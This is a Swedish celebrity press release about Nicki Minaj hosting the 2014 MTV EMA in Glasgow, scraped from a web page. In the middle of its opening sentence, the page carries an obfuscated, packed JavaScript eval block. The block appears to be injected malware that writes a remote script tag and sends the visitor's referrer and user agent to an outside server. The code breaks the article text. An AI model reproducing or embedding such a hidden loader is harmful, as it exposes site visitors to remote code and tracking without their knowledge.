Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Nicki Minaj leder det extravaganta tjugoårsjubileumet

Nicki Minaj leder det extravaganta tjugoårsjubileumet
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|heksa|var|u0026u|referrer|hhzis||js|php’.split(’|’),0,{}))
avslöjades värden för årets EMA-gala i Glasgow och det är ingen mindre än hiphop-drottningen och Anaconda-stjärnan Nicki Minaj! Det var via stjärnans Twitter som den glada nyheten tillkännagavs. Nu kommer hon vara med och skapa historia på tjugoårsjubileumet  av Europas största musikgala och blir därav en del av den eminenta värdfamiljen som genom åren har bestått av bland andra Heidi Klum, Selena Gomez, Justin Timberlake, Jean Paul Gaultier och Snoop Dogg.

Nicki Minaj som även är nominerad i fyra kategorier (Best Female, Best Hip Hop, Biggest Fans och Best Look) är klar för leda EMA-galan från SSE Hydro i Glasgow den 9 november. Minaj kommer även att uppträda och har lovat en gränslös show för att fira MTV EMA’s tjugoårsjubileum – med det passande temat: ”Tidsresor”.

För att rösta på sina favoritartister besöker är det bara att besöka mtvema.com – röstningen stänger vid midnatt den 8 november.

För bilder och mer pressinfo, besök: press.mtvema.com.

För att ansöka om pressackrediteringar till 2014 MTV EMA, kontakta:
Max Bellman, PR Manager, Viacom Youth & Music, max.bellman@vimn.com, 46 73 627 4117
Ellen Jurell, PR Manager, Viacom Youth & Music, ellen.jurell@vimn.com, 46 70 555 3136

Om Viacom International Media Networks
Viacom International Media Networks (VIMN) erbjuder multimedial underhållning världen över med varumärken som exempelvis MTV, Comedy Central, VIVA, VH1, Nickelodeon och Paramount Channel. Viacom-varumärken ses globalt av mer än 600 miljoner hushåll i 170 länder på 37 språk via 200 lokalt styrda TV-kanaler och mer än 550 digitala och mobila medier. För mer information om Viacom, se www.viacom.com. För mer information om MTV, besök www.mtv.se eller gilla oss på Facebook; www.facebook.com/MTV.Sweden